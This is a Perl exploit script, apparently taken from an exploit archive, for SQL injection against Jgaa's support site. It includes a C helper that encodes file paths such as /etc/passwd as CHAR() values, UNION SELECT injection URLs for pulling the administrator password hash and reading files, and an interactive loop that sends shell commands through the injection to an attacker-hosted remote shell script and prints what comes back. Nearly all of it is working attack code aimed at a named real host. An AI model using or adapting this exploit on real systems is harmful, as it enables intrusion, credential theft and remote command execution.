jgaa remote SQL injection exploit that allows administrator password hash retrieval.
1f985808327542ceaf40c4201340e279d95406ff802e793817633815898a85db
#!/usr/bin/perl
#You can retrieve the admin password hash, or read the password file on a *NIX
#host, using the numeric (CHAR()) strings produced by the generator.c program
#below. You have to feed it SQL-specific commands; my example is for
#table names and the *NIX password file.
#exploit tested on winxp sp2
# #include<stdio.h>
# #include<stdlib.h>
# #include<string.h>
# int main()
# { char st[1024];
# int le;
# printf("Input : ");
# if (!fgets(st, sizeof st, stdin)) return 1; /* gets() has no bound; fgets() caps the read at the buffer size */
# st[strcspn(st, "\n")] = '\0';                /* drop the newline fgets() keeps, so output matches gets() */
# for(le=0;le<strlen(st);le++)
# { printf("%d,",st[le]);
# }
# system("pause");
# return 0;
# }
#101,116,99,47,112,97,115,115,119,100 decodes to "etc/passwd" (no leading slash); prepend 47 ('/') to get "/etc/passwd"
#If we request this :
#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
#the UNION supplies nine placeholder columns (0..8); the count has to match the
#original SELECT or the query errors out. To see which placeholders are rendered
#in the page, use an ID that matches no row so only the UNION's values appear :
#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
# Title banner, printed before anything else runs.  One single-quoted heredoc
# instead of a print per line; the two empty lines reproduce the doubled
# newlines after the e-mail line and after the closing dotted rule.
print <<'BANNER';
......Start.......
.................
. fl0 fl0w .
. found by fl0w fl0w
. c0ded by fl0 fl0w
.......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com

.................

BANNER
use LWP::UserAgent;
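# ---------------------------------------------------------------------------
# Main loop: read commands from STDIN and send each one through the injection
# point, printing whatever output comes back.
#
# Arguments (all three required):
#   $ARGV[0]  base URL of the target, e.g. http://support.jgaa.com
#   $ARGV[1]  URL of the remote script appended after the UNION SELECT payload;
#             it is expected to read the command from a query parameter
#   $ARGV[2]  name of that query parameter
#
# Defects fixed here: @ARGV[0] slices are now $ARGV[0] element accesses; the
# third argument is validated (it was never checked, and $site was tested
# twice); `requesting` and `i` were barewords missing their `$`, so the request
# object was never passed and the first content check never matched; the
# newline<->ê tr/// round trip was wrong (the reverse tr/[&234;]/[\n]/ mapped
# '&', '2', '3', '4' and ';', never 'ê') and is replaced by the /s regex flag;
# EOF on STDIN now ends the session instead of re-prompting forever; and the
# `last` that sat outside any loop is gone.
# ---------------------------------------------------------------------------
use strict;
use warnings;

my ( $site, $shells, $shellcmd ) = @ARGV;

# Refuse to run unless all three arguments are present and the target is an
# http:// URL; routine() prints the usage text and exits.
routine()
    if !defined $site     || $site !~ m{^http://}
    || !defined $shells   || !length $shells
    || !defined $shellcmd || !length $shellcmd;

$site =~ s{/+\z}{};    # avoid '//index.php' when the URL has a trailing slash

header();

# One agent for the whole session; there is no reason to build one per command.
my $ua = LWP::UserAgent->new() or die "cannot create LWP::UserAgent\n";

# Everything in the URL up to the command itself is constant for the session.
my $url_prefix = $site
    . '/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'
    . $shells . '?&' . $shellcmd . '=';

print "[shell] \$";
while ( defined( my $line = <STDIN> ) ) {
    chomp $line;

    if ( !length $line ) {
        print "Enter a command\n\n";
        print "[shell] \$";
        next;
    }

    # Percent-encode the command so spaces, '&', '=', '#' and non-ASCII bytes
    # survive the query string instead of being re-parsed by the server.
    # (Type the command raw; it must not be pre-encoded or it is encoded twice.)
    ( my $encoded = $line ) =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord $1)/ge;

    my $response = $ua->request( HTTP::Request->new( GET => $url_prefix . $encoded ) );

    # A transport or non-2xx failure has no page to parse; say so and re-prompt.
    if ( !$response->is_success ) {
        print "\nHTTP request failed: ", $response->status_line, "\n\n";
        print "[shell] \$";
        next;
    }

    my $body = $response->content;
    $body = '' unless defined $body;

    # These messages mean the injected include never ran on the server, so no
    # later command can work either; give up.
    if (   $body =~ /failed to open:HTTP request failed!/
        || $body =~ /:cannot execute the command in <b>/ )
    {
        print "\nCould NOT connect to cmd from host \n";
        exit 1;
    }

    # Command output, when present, sits in front of two WARNING blocks; /s lets
    # '.' span newlines so the output keeps its original line breaks.
    if ( $body =~ /^<br.\/>.<b>WARNING/s ) {
        print "\nInvalid command\n\n";
    }
    elsif ( $body =~ /(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/s ) {
        print "\n$1\n";
    }

    print "[shell] \$";
}

print "\n";    # EOF on STDIN (Ctrl-D) ends the session cleanly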
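# Print the tool's title block: the vulnerability summary, the PoC site and the
# demo URL that triggers the UNION SELECT.  Takes no arguments, returns nothing.
# No `()` prototype: the sub is called above its definition, and a prototype
# there only buys a "called too early to check prototype" warning.
sub header {
    print q {
================================================================================================================================================================
MSQL injection -file disclosure in Jgaa's Internet
PoC:http://support.jgaa.com
Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*
================================================================================================================================================================
};
    return;
}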
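# Print the title block and the usage text, then exit non-zero.  Called when the
# command line does not supply all three arguments the script needs.  The usage
# text now lists those three arguments (<site> <shell-url> <cmd-param>); the old
# text showed a single argument and an example that was not a valid command.
sub routine {
    header();
    print q {
======================================================================================================
USAGE:   perl exploit.pl <http://site.com> <http://host/shell-script> <cmd-parameter>
EXAMPLE: perl exploit.pl http://support.jgaa.com http://your-host.example/shell cmd
======================================================================================================
};
    exit(1);
}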